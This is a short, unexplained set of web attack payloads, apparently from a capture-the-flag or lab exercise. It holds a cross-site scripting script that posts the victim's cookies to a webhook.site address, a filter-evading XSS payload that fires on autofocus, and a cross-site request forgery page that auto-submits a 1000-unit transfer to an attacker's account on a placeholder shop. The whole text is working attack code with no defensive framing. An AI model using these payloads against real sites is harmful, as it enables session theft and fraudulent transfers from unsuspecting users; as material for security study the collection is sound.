<script>
fetch('https://webhook.site/83c5986d-1104-431c-af4c-c588a32aa7c5', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

--------

<button autofocus onfocus=window['al'+'ert'](1)> click </button>

--------


<html>
  <form action="http://easyshopURL/send" method="POST">
    <input name="to" value="mioIndirizzoESC" />
    <input name="amount" value="1000" />
  </form>
  <script>
    document.getElementsByTagName("form")[0].submit();
  </script>
</html>
